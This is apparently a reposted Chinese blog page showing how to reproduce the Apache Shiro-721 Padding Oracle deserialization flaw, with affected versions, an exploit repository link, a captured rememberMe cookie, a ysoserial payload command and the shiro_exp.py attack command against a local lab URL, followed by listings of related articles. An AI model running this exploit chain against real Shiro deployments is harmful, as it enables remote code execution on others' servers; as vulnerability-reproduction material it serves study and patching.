shiro oracle 表结构,Shiro Padding Oracle Attack

最新推荐文章于 2023-03-10 09:49:48 发布
最新推荐文章于 2023-03-10 09:49:48 发布
阅读量116 收藏
点赞数
文章标签: shiro oracle 表结构

影响版本(影响1.2.4之后):

1.2.5,

1.2.6,

1.3.0,

1.3.1,

1.3.2,

1.4.0-RC2,

1.4.0,

1.4.1

下载:

https://github.com/3ndz/Shiro-721

# 安装paddingoracle

python2 setup.py install

# 准备登陆成功之后的rememberMe的Cookie值

qMkdx0k1eAJ3Ds0BwAwhVUm9wJRQFyBCt8zOVkFsR2VHiFfaRynCFWACjNET0dMYe58QkWSoc3DUXpZji5AD4Pqmt/3b7+0QO8142fwnB7ejIiNgMay2Rf+OaNEqZrxmIL+6d5rO49yq8gPlJA74gkXvGgihnT0kU+3riDJmoZBGdVvSRTV/ugl1tViv3Pnpd+QtzOR9v/VAFfLMch/vE+PGhczOwXc6U08cqohaQd0oO60LaBPc4/N87SFL63D/YkZbxFeSUelDYlzc+mLhC8teQlse7rEDs6NE+lq1/0pK7vIawtQ1XjVjwtx+Bz58j0RAMUOnOE+A2tHrL3TC/azSauRhKlXdsNDyVDBffBww5mtrouwBuKtspDyaJIbnS1SoSWbSVNpSnJ/WBIRhuIiSCbzSBnnVwdEmzFtBKdJ5O+t9JWsE7BRENe8kS34g3LBuKADwx1uQTeUpE5KX8qF3E9hXupmOMKkjYQ66j81z1LudadJP5PCLdYXVWFYS

# 准备ysoserial生成的序列化数据文件

D:\repos\Java\jdk1.7.0_80\bin\java.exe -jar D:\repos\ysoserial\target\ysoserial-0.0.8-SNAPSHOT-all.jar CommonsBeanutils1 calc > CommonsBeanutils1_calc.ser

# 准备shiro的页面url

http://cqq.com:8088/samples_web_war/home.jsp

# 开始攻击

"D:\Python27\python2.exe" shiro_exp.py http://cqq.com:8088/samples_web_war/home.jsp qMkdx0k1eAJ3Ds0BwAwhVUm9wJRQFyBCt8zOVkFsR2VHiFfaRynCFWACjNET0dMYe58QkWSoc3DUXpZji5AD4Pqmt/3b7+0QO8142fwnB7ejIiNgMay2Rf+OaNEqZrxmIL+6d5rO49yq8gPlJA74gkXvGgihnT0kU+3riDJmoZBGdVvSRTV/ugl1tViv3Pnpd+QtzOR9v/VAFfLMch/vE+PGhczOwXc6U08cqohaQd0oO60LaBPc4/N87SFL63D/YkZbxFeSUelDYlzc+mLhC8teQlse7rEDs6NE+lq1/0pK7vIawtQ1XjVjwtx+Bz58j0RAMUOnOE+A2tHrL3TC/azSauRhKlXdsNDyVDBffBww5mtrouwBuKtspDyaJIbnS1SoSWbSVNpSnJ/WBIRhuIiSCbzSBnnVwdEmzFtBKdJ5O+t9JWsE7BRENe8kS34g3LBuKADwx1uQTeUpE5KX8qF3E9hXupmOMKkjYQ66j81z1LudadJP5PCLdYXVWFYS D:\repos\ysoserial\CommonsBeanutils1_calc.ser

6964a28f2741b65880ccaba02ecbc1b8.png

据说要几个小时。

据说是在对1.2.4的shiro-550的修复方式中引入的,然后在 Apache Shior(1.4.2)修复。

参考:

原文链接:https://blog.csdn.net/caiqiiqi/article/details/109289504

多行不易
关注
5、Shiro+Oracle实现用户授权(Authentication)
全栈软件工程师-陈征峰的博客
07-15 652
如何使用Shiro+oracle实现用户授权
Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现
whojoe的博客
05-11 4766
Apache Shiro Padding Oracle AttackShiro-721)漏洞复现环境搭建安装git使用dockerfile启动docker获取dockerfile查看是否搭建成功centos7+tomcat8启动docker一系列命令登录测试账户抓取cookie安装maven使用Java反序列化工具 ysoserialshiro_exp.py参考文章 环境搭建 环境使用centos7+docker 安装git yum install git 使用dockerfile 启动docker
Shiro Padding Oracle Attack
公众号shadow sock7
10-26 572
#TODO 参考: 我对Padding Oracle攻击的分析和思考(详细) Shiro Padding Oracle Attack 反序列化 Apache Shiro源码浅析之从远古洞到最新PaddingOracle CBC https://github.com/threedr3am/marshalsec#2-shiropaddingoraclecbc padding oracle 原理深度解析 & CBC 字节翻转攻击原理解析 ...
shiro 721 反序列化漏洞复现与原理以及Padding Oracle Attack攻击加解密原理
Shanfenglan's blog
11-14 1万+
文章目录利用条件shiro550shiro721环境搭建漏洞复现 利用条件 shiro550 知道key且目标服务器含有可利用的攻击链 影响版本:1.2.4以下 shiro721 知道已经登陆用户的合法cookie,利用padding orcale 加密生成恶意rememberme的值进行利用 影响版本: 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1 环境搭建 git clone https://github.com/inspiri
第5篇 | Shiro Padding Oracle无key的艰难实战利用过程
ABC_123的博客
04-23 707
‍Part1 前言大家好,上期分享了银行站的一个Java 的SSRF组合洞案例,这期讲讲分享一个Shiro Padding Oracle漏洞利用过程。Shiro反序列化漏洞自16年公布以来,至今已经有6年了,每次攻防比赛都还能遇到,其攻击大致可分为2种方式:1一种就是平时攻击队最常用的Shiro-550,对应CVE-2016-4437,影响范围Apache s.........
第03篇:Shiro 反序列化漏洞利用汇总1
08-03
本文主要关注Shiro中的两个安全漏洞,一个是RememberMe反序列化漏洞(Shiro-550),另一个是Padding Oracle AttackShiro-721),以及如何进行自动化漏洞利用。 1. Shiro RememberMe反序列化漏洞(Shiro-550) 这...
Padding Oracle Attack填充提示攻击-渗透测试
HBohan的博客
07-06 697
漏洞简介 最近学习了一个shiro的 Critica级漏洞的验证,利用Padding Oracle Vulnerability破解rememberMe Cookie,达到反序列化漏洞的利用,攻击者无需知道rememberMe的加密密钥。 明文分组和填充就是PaddingOracleAttack的根源所在,但是这些需要一个前提,那就是应用程序对异常的处理。当提交的加密后的数据中出现错误的填充信息时,不够安全的应用程序解密时报错,直接抛出“填充错误”异常信息。 Padding Oracle Attack是.
shiro attack怎么用
最新发布
10-10
Shiro Attack工具提供了几种不同的攻击模式,如Padding Oracle、JRMP Gadgets、Sleep Attack等。你可以根据你的需求选择适合的攻击模式。 接下来,你需要指定目标URL。这是你想要测试和评估的网络系统的URL地址。...
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
java_lujj的博客
08-29 3565
Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。、
Apache Shiro系列漏洞利用以及实战总结
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
基于mysql的shiro项目转oracle数据库
软件老王
04-11 249
1、问题说明 改造以前的一个shiro项目,以前数据库用的mysql,要更改成oracle,记录下,希望能帮到有需要的朋友。 2、解决方案 因为数据库中结构,也就6个张(5个权限+一个日志),原方案是想根据数据库字段,转到pownerdesigner中,然后再转出来,后来发现太麻烦放弃了。 2.1 使用navicat premium (1)通过navicat premimum 连接oracle数据库。 (2) 选中数据库,右键选中转储SQL文件,然后选择仅结构,就能导出oraclesql了。
4、Shiro+Oracle实现用户登录认证
全栈软件工程师-陈征峰的博客
07-14 510
采用Shiro+Oracle的实现用户登录验证
7、Shiro+SpringMVC+oracle+maven整合
全栈软件工程师-陈征峰的博客
07-18 983
手把手讲授shiro、springmvc和Oracle整合
shiro反序列化漏洞学习(工具+原理+复现)
qq_49849300的博客
03-10 1万+
由于shiro反序列化需要用到AES加密,而该加密方法的密钥是加解密一致的,所以我们使用shiro反序列化时,AES加密的密钥必须跟服务器一致,所以经常需要盲猜服务器的密钥,好在java开发们一般都不会去修改它,而且常常直接copy论坛和github上的代码,所以可以大量收集各种密钥,然后遍历来完成反序列化漏洞利用。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化。"方法,Base64.decode()中的字符串就是shiro的密钥,要确保该密钥的安全性,千万不要使用公开的密钥。
JAVAWEB开发之权限管理(二)——shiro入门详解以及使用方法、shiro认证与shiro授权
07-16 1万+
shiro介绍 什么是shiro shiro是Apache的一个开源框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证,权限授权、加密、会话管理等功能,组成了一个通用的安全认证框架。它可以实现如下的功能: 1.验证用户 2.对用户执行访问控制,如:判断用户是否具有角色admin,判断用户是否拥有访问的资源权限。 3.在任何环境下使用SessionAPI。例如C/S程序 4
Shiro系列之Shiro+Mysql实现用户授权(Authorization)
Chris Mao的专栏
10-18 388
昨天,我在《Shiro系列之Shiro+Mysql实现用户认证(Authentication)》中简单介绍了使用Shiro+Mysql实现用户认证的功能,今天我们继续使用其中的示例,讲解一下如何实现用户授权。   所谓授权,就是判断当前用户具体哪些权限,能够执行哪些操作,或是访问哪些资源(Web中的URL,又或是页面上的一个按钮,一个编辑框等都可以视为资源)。因此我们需要数据来存储这些资...
Shiro系列之Shiro+Spring MVC整合(Integration)
Chris Mao的专栏
10-21 430
Shiro系列之Shiro+Spring MVC整合 第一步,Shiro Filter 在web.xml文件中增加以下代码,确保Web项目中需要权限管理的URL都可以被Shiro拦截过滤。 <!-- Shiro Filter --> <filter> <filter-name>shiroFilter</filter-n...
CTF-web XMAN-2018 第七天 web 文件包含与cookie会话
iamsongyu的博客
01-05 755
优先看一看有没有一些危险的函数,这样很可能存在命令执行。 反引号可以直接执行系统命令。 不是php的话,会当做文本文件显示,还可以包含一个一句话木马(对文件类型没有要求)   文件包含作用 重用代码,相当于c语言头文件的感觉。常见的几个文件包含函数,require没有文件就报错,include会继续执行   大佬例题  http://202.112.51.184:8007 文件上传...
Shiro权限框架简介
热门推荐
崔成龙 . 勇往直前
01-05 2万+
最近加入了gxpt项目组,被安排做权限模块,所以也有幸第一次接触到了Shiro框架。让我们来一起领略Shiro的风采吧。 什么是Apache Shiro?        Apache Shiro(发音为“shee-roh”,日语“堡垒(Castle)”的意思)是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理功能,可为任何应用提供安全保障 - 从命令行应用、移动应用到大型网络及
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值